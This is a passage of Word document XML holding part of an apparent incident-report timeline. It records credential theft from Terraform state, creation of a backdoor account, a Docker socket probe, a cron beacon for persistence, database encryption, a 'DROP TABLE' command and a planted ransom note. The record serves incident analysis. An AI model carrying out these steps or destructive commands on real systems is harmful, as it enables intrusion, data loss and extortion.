              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7696A82C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:30:35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="17390616" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7BDE584A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-minio-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6176193B" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>credentials.json retrieved — terraform-state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="5CE8885E" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31F24801" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:34:36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3993498C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="262F2F96" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-nacos-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="357E8FDF" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">403 — blank password hash rejected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="600A5B09" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7CD8FAEA" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:35:07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="28D2A5F8" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="527BD6CC" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-nacos-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3CE90A90" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>svc_maint backdoor account created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="47B2D92B" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="468F4EBE" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:35:32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7D3CD89C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="78FB9E07" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="161FF157" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Docker socket probed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="54B6F3F5" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E2036F4" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:35:51</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2D6FE664" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">C2 Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="67328BC8" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3B00C19A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Cron job planted — 1-minute beacon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="7A9DCFB1" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="27125D8E" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0590C468" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5E1C5F89" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7E60CC91" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">AES_ENCRYPT — 1342 rows encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="0B21766F" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2557821E" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6A40592C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2549A763" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1049BBD7" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DROP TABLE config_info, history</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="5F585AB1" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7AD64B11" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="65E104DF" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0E2DBC4F" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="61EF9E66" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">README_RANSOM table created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="167FF4CD" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="74BE7370" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:44</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="38E4C062" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7CC87C93" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="71EADD46" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Ransom note inserted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="09B3CE42" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicators of Compromise</w:t>
      </w:r>
    </w:p>
